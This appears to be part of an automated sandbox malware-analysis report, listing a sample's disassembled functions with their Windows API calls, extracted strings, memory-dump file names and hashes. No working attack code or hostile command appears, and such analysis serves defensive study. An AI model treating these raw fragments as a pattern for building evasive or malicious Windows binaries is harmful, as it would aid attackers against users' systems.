Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Strings

\pA, xrefs: 00401908
.pA, xrefs: 0040168D
2pA, xrefs: 004016D6
2pA, xrefs: 004016AC
&pA, xrefs: 00401560
$pA, xrefs: 00401656
2pA, xrefs: 00401704
\pA, xrefs: 004015FE
\pA, xrefs: 004015A1, 004015D8, 004015E2, 004015F4, 004015DC, 004015E6, 004015EE, 004015F8
6pA, xrefs: 004017DE
\pA, xrefs: 00401846
6pA, xrefs: 00401872
6pA, xrefs: 00401795
\pA, xrefs: 0040159B

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
API String ID: 1295435411-2952853158
Opcode ID: af3dae6db891e923df4a4e706107fb4aaecf548916866d68cba43d12f02d6bed
Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
Opcode Fuzzy Hash: af3dae6db891e923df4a4e706107fb4aaecf548916866d68cba43d12f02d6bed
Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E

Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00409373

Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A

memset.MSVCRT ref: 00409381
LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
wcsncpy.MSVCRT ref: 004093DD
wcslen.MSVCRT ref: 004093F1
CoTaskMemFree.OLE32(?), ref: 0040947A
wcslen.MSVCRT ref: 00409481
FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Strings

P, xrefs: 00409429
$0A, xrefs: 004093CD
SHELL32.DLL, xrefs: 00409389
SHGetPathFromIDListW, xrefs: 004093B2
SHBrowseForFolderW, xrefs: 004093AA

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
API String ID: 4193992262-92458654
Opcode ID: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
Opcode Fuzzy Hash: cbde42508be9eaa54418296cf2fcec228ecaff496ce27a8586192ba66c484795
Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A

Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON

Download Yara Rule

APIs

wcsncpy.MSVCRT ref: 00406405

Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A

_wcsdup.MSVCRT ref: 0040644E
_wcsdup.MSVCRT ref: 00406469
_wcsdup.MSVCRT ref: 0040648C
wcsncpy.MSVCRT ref: 00406578
free.MSVCRT ref: 004065DC
free.MSVCRT ref: 004065EF
free.MSVCRT ref: 00406602
wcsncpy.MSVCRT ref: 0040662E

Strings

$0A, xrefs: 0040631F
$0A, xrefs: 0040632F
$0A, xrefs: 0040633E

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: _wcsdupfreewcsncpy$Value
String ID: $0A$$0A$$0A
API String ID: 1554701960-360074770
Opcode ID: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
Opcode Fuzzy Hash: f59d57380f8462386650d730b526675ad7e9bff01cb308e942a75ae948ec079d
Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A

Function 0040AEBA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
Part of subcall function 0040E900: HeapReAlloc.KERNEL32(02490000,00000000,?,?), ref: 0040E967

LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
wcscpy.MSVCRT ref: 0040AF1B
wcscat.MSVCRT ref: 0040AF26
wcslen.MSVCRT ref: 0040AF2C
CoTaskMemFree.OLE32(?,00000000,00000000,?,02499760,00000000,00000000), ref: 0040AF3A
FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
wcscat.MSVCRT ref: 0040AF59
wcslen.MSVCRT ref: 0040AF5F

Strings

Shell32.DLL, xrefs: 0040AEDE
Downloads\, xrefs: 0040AF53
SHGetKnownFolderPath, xrefs: 0040AEEF

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
API String ID: 1740785346-287042676
Opcode ID: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
Opcode Fuzzy Hash: 3b5950ac527df3ef7cda72db0df74ea4b6227c4cc24e67ecc582cb497ed06186
Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF

Function 00412722 Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
GetCurrentThread.KERNEL32 ref: 004127B7
GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 298514914-0
Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68

Function 00403221 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0

Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02490000,00000000,?,?), ref: 0040E5BC

PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D

Strings

sysnative, xrefs: 004032CE, 004032D3

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
String ID: sysnative
API String ID: 3406704365-821172135
Opcode ID: 06246fb3350c889958c456c83ddef363d069b28f08760247f4de7035fd8ff5d7
Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
Opcode Fuzzy Hash: 06246fb3350c889958c456c83ddef363d069b28f08760247f4de7035fd8ff5d7
Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E

Function 0040E0C3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76ED5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135

Strings

Kernel32.dll, xrefs: 0040E0CA
InitOnceExecuteOnce, xrefs: 0040E0E0

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
String ID: InitOnceExecuteOnce$Kernel32.dll
API String ID: 2918862794-1339284965
Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D

Function 00409507 Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
GetCurrentThreadId.KERNEL32 ref: 0040951F
IsWindowVisible.USER32(?), ref: 00409526

Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE

GetCurrentThreadId.KERNEL32 ref: 00409543
GetWindowLongW.USER32(?,000000EC), ref: 00409550
GetForegroundWindow.USER32 ref: 0040955E
IsWindowEnabled.USER32(?), ref: 00409569
EnableWindow.USER32(?,00000000), ref: 00409579

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
String ID:
API String ID: 3383493704-0
Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D

Function 00408EB4 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00408EED
GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
GetWindowTextLengthW.USER32 ref: 00408F0A
HeapAlloc.KERNEL32(00000000), ref: 00408F1F
GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
DestroyWindow.USER32(?), ref: 00408F3D
UnregisterClassW.USER32 ref: 00408F53

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
String ID:
API String ID: 2895088630-0
Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58

Function 00409588 Relevance: 9.1, APIs: 6, Instructions: 68threadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(00409507,?), ref: 0040959B
GetCurrentThreadId.KERNEL32 ref: 004095B3
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
GetCurrentThreadId.KERNEL32 ref: 004095EF
EnableWindow.USER32(?,00000001), ref: 00409605
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$CurrentThread$EnableEnumWindows
String ID:
API String ID: 2527101397-0
Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18

Function 0040D9D3 Relevance: 9.1, APIs: 6, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocValue$Heap
String ID:
API String ID: 2472784365-0
Opcode ID: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
Instruction ID: 2e0cfeba47cec0f6b91efb2e93d625c98a83c07df354da5318bce0fb1280086a
Opcode Fuzzy Hash: 7f6b70932fc1a08cda45a5a13933a08f33854a1b42fa358b63a86d14e57a1294
Instruction Fuzzy Hash: 1C118676A45310AFD7109FA5EC44AA67FA9EB18760B05813EF904D7370DA359C44CBAC

Function 004126A4 Relevance: 9.0, APIs: 6, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

UnregisterWait.KERNEL32(?), ref: 004126AE
CloseHandle.KERNEL32(?,?,?,?,0041282A,?), ref: 004126B7
EnterCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126C3
LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0041282A,?), ref: 004126E8
HeapFree.KERNEL32(00000000,00000000,?,?,?,0041282A,?), ref: 00412706
HeapFree.KERNEL32(?,?,?,?,?,0041282A,?), ref: 00412718

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CriticalFreeHeapSection$CloseEnterHandleLeaveUnregisterWait
String ID:
API String ID: 4204870694-0
Opcode ID: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
Instruction ID: 8ad69fc92b526a08bfe7472bb61da84b570d2b31100e81d3d28f3db860eb322d
Opcode Fuzzy Hash: f70a7c029a070c226780d23f7e43a7120967b39c5434bc4d35a475d06415ef98
Instruction Fuzzy Hash: ED014874202605BFC7159F11ED88ADABB79FF49352310843EE51AC6A60CB35A861CBA8

Function 004057F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

wcsncmp.MSVCRT ref: 00405853
memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
wcsncpy.MSVCRT ref: 004058F9

Strings

$0A, xrefs: 0040580C
$0A, xrefs: 00405819

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: memmovewcsncmpwcsncpy
String ID: $0A$$0A
API String ID: 1452150355-167650565
Opcode ID: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
Instruction ID: 832c062924e7bef47b33d77ba9c88e4f4304e1b7f9fac3bbf8cf3561daacd64f
Opcode Fuzzy Hash: 14318413d9adc2e2b942005046f5369366b6e76739e1c09bf8bc34821c1b3a51
Instruction Fuzzy Hash: 7131C336904B058BC720BA55888057B77A8EE84384F14893EEC8537382EB799D61CBA9

Function 0040552C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040553B
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A

Strings

RtlGetVersion, xrefs: 00405554
ntdll.dll, xrefs: 00405545

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
